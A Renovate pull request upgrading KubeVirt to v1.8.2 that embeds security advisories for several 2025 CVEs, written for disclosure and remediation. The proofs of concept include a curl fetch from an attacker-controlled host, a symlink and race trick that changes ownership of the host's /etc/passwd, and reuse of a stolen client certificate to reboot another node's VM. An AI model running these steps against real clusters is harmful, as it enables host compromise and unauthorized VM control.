Skip to content

chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24)#837

Open
redhat-renovate-bot wants to merge 1 commit intorelease-v0.24from
renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability
Open

chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24)#837
redhat-renovate-bot wants to merge 1 commit intorelease-v0.24from
renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability

Conversation

@redhat-renovate-bot
Copy link
Copy Markdown
Collaborator

@redhat-renovate-bot redhat-renovate-bot commented Apr 20, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Type Update Change
kubevirt.io/kubevirt require minor v1.4.0v1.8.2

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

  1. A symbolic link (launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
  2. Another symbolic link (disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.
  3. As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The below is inspired by an article, where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.

##### Download an container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar

##### Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine

##### Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh

##### Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
##### The user is root in its new USER namesapce
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root

##### Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin

##### Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"

##### Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img

##### Create the socket wich will confuse the isolator detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
  // ...
  //!!! MK: the change should happen here before executing the below line !!!
  isolationRes, err := c.podIsolationDetector.Detect(vmi)
		if err != nil {
			return fmt.Errorf(failedDetectIsolationFmt, err)
		}
		virtLauncherRootMount, err := isolationRes.MountRoot()
		if err != nil {
			return err
		}
		// ...

		// initialize disks images for empty PVC
		hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
		// MK: here the permissions are changed
		err = hostDiskCreator.Create(vmi)
		if err != nil {
			return fmt.Errorf("preparing host-disks failed: %v", err)
		}
    // ...

The manifest of the #acr("vmi") which is going to trigger the bug is:

##### The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:

##### the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-launcher connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host's /etc/passwd file:

##### `virt-launcher` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0
admin@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd

admin@minikube:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash

The attacker controlling an unprivileged user can now update the contents of the file.

Impact

What kind of vulnerability is it? Who is impacted?

This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.

Severity

  • CVSS Score: 5.0 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes in kubevirt.io/kubevirt

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

Summary

Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server, and it proxies API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used by virt-api is defined in the source code as follows and have the following properties:

//pkg/virt-api/api.go

const (
	...
	defaultCAConfigMapName     = "kubevirt-ca"
  ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)
##### verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client certificates using a self-signed root CA. This latter is generated by virt-operator when the KubeVirt stack is deployed and it is stored within a ConfigMap in the kubevirt namespace. This configmap is used as a trust anchor by all virt-handler instances to verify client certificates.

##### inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138

The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

##### the virt-handler's server ceriticate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate:

<code.sec.SetupTLSForVirtHandlerServer>

//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
	
	//...
				// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
				VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
					return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
				},
				//...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
  //...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	//...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	//...

The above code illustrates that client certificates accepted be KubeVirt should have as CN kubevirt.io:system:client:virt-handler which is the same as the CN present in the virt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a virt-handler instance.

In addition to the extension API server, any other virt-handler can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes are going to use structures called ProxyManager to communicate back and forth on the state of the migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by both virt-handler and virt-api shares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02) thus, with two virt-handler instances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the virt-handler instance running on the compromised node (minikube) while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on the other node:

##### the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
##### the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0

##### get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

##### soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted

##### the VMI mishandling-common-name-in-certificate-handler has been rebooted
Impact

What kind of vulnerability is it? Who is impacted?

Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the managed by it VM.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

A flawed implementation of the Kubernetes aggregation layer's authentication flow could enable bypassing RBAC controls.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap.

The Kubernetes API server proxies received client requests through a component called aggregator (part of K8S's API server), and authenticates to the virt-api server using a certificate signed by the CA specified via the --requestheader-client-ca-file CLI flag. This CA bundle is primarily used in the context of aggregated API servers, where the Kubernetes API server acts as a trusted front-end proxy forwarding requests.

While this is the most common use case, the same CA bundle can also support less common scenarios, such as issuing certificates to authenticating front-end proxies. These proxies can be deployed by organizations to extend Kubernetes' native authentication mechanisms or to integrate with existing identity systems (e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes API server can trust these external proxies as legitimate authenticators, provided their client certificates are signed by the same CA as the one defined via --requestheader-client-ca-file.
Nevertheless, these external authentication proxies are not supposed to directly communicate with aggregated API servers.

Thus, by failing to validate the CN field in the client TLS certificate, the virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.

However, two key prerequisites must be met for successful exploitation:

  • The attacker must possess a valid front-end proxy certificate signed by the trusted CA (requestheader-client-ca-file). For example, they can steal the certificate material by compromising a front-end proxy or they could obtain a bundle by exploiting a poorly configured and managed PKI system.

  • The attacker must have network access to the virt-api service, such as via a compromised or controlled pod within the cluster.

These conditions significantly reduce the likelihood of exploitation. In addition, the virt-api component acts as a sub-resource server, meaning it only handles requests for specific resources and sub-resources . The handled by it requests are mostly related to the lifecycle of already existing resources.

Nonetheless, if met, the vulnerability could be exploited by a Pod-Level Attacker to escalate privileges, and manipulate existing virtual machine workloads potentially leading to violation of their CIA (Confidentiality, Integrity and Availability).

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Bypassing authentication

In this section, it is demonstrated how an attacker could use a certificate with a different CN field to bypass the authentication of the aggregation layer and perform arbitrary API sub-resource requests to the virt-api server.

The kube-apiserver has been launched with the following CLI flags:

admin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28
    Command:
      kube-apiserver
      --advertise-address=192.168.49.2
      --allow-privileged=true
      --authorization-mode=Node,RBAC
      --client-ca-file=/var/lib/minikube/certs/ca.crt
      --enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
      --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
      --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
      --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
      --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=8443
      --service-account-issuer=https://kubernetes.default.svc.cluster.local
      --service-account-key-file=/var/lib/minikube/certs/sa.pub
      --service-account-signing-key-file=/var/lib/minikube/certs/sa.key
      --service-cluster-ip-range=10.96.0.0/12
      --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
      --tls-private-key-file=/var/lib/minikube/certs/apiserver.key

By default, Minikube generates a self-signed CA certificate (var/lib/minikube/certs/front-proxy-ca.crt) and use it to sign the certificate used by the aggregator (/var/lib/minikube/certs/front-proxy-client.crt):

##### inspect the self-signed front-proxy-ca certificate
admin@minikube:~$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-ca.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-ca

##### inspect the front-proxy-client certificate signed with the above cert
$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-client.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-client

One can also inspect the contents of the extension-apiserver-authentication ConfigMap which is used as a trust anchor by all extension API servers:

admin@minikube:~$ kubectl -n kube-system describe configmap extension-apiserver-authentication
Name:         extension-apiserver-authentication
Namespace:    kube-system
Labels:       <none>
Annotations:  <none>

Data
====
requestheader-client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE
AxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3
WjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/
t4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO
2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9
ObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P
hEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG
Q6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/
BAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa
I+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA
A4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI
G/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7
orKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf
l9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe
VHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX
fZnj69fu0JWfrq88M+LnKOyfkqi4
-----END CERTIFICATE-----

requestheader-extra-headers-prefix:
----
["X-Remote-Extra-"]

requestheader-group-headers:
----
["X-Remote-Group"]

requestheader-username-headers:
----
["X-Remote-User"]

client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK
ShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA
arQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb
BWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD
/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG
J/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try
e8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W
zZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe
QWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz
8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v
yPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ
o4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq
JPwzd6yDCMUuZQ==
-----END CERTIFICATE-----

requestheader-allowed-names:
----
["front-proxy-client"]

BinaryData
====

Events:  <none>

It is assumed that an attacker has obtained access to a Kubernetes pod and could communicate with virt-api reachable at 10.244.0.6.

root@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .
{
  "paths": [
    "/apis",
    "/openapi/v2",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1alpha3"
  ]
}

The virt-api service has two types of endpoints -- authenticated and non-authenticated:

// pkg/authorizer/authorizer.go

var noAuthEndpoints = map[string]struct{}{
	"/":           {},
	"/apis":       {},
	"/healthz":    {},
	"/openapi/v2": {},
	// Although KubeVirt does not publish v3, Kubernetes aggregator controller will
	// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint
	"/openapi/v3": {},
	// The endpoints with just the version are needed for api aggregation discovery
	// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1
	"/apis/subresources.kubevirt.io/v1":               {},
	"/apis/subresources.kubevirt.io/v1/version":       {},
	"/apis/subresources.kubevirt.io/v1/guestfs":       {},
	"/apis/subresources.kubevirt.io/v1/healthz":       {},
	"/apis/subresources.kubevirt.io/v1alpha3":         {},
	"/apis/subresources.kubevirt.io/v1alpha3/version": {},
	"/apis/subresources.kubevirt.io/v1alpha3/guestfs": {},
	"/apis/subresources.kubevirt.io/v1alpha3/healthz": {},
	// the profiler endpoints are blocked by a feature gate
	// to restrict the usage to development environments
	"/start-profiler": {},
	"/stop-profiler":  {},
	"/dump-profiler":  {},
	"/apis/subresources.kubevirt.io/v1/start-cluster-profiler":       {},
	"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler": {},
	"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler":  {},
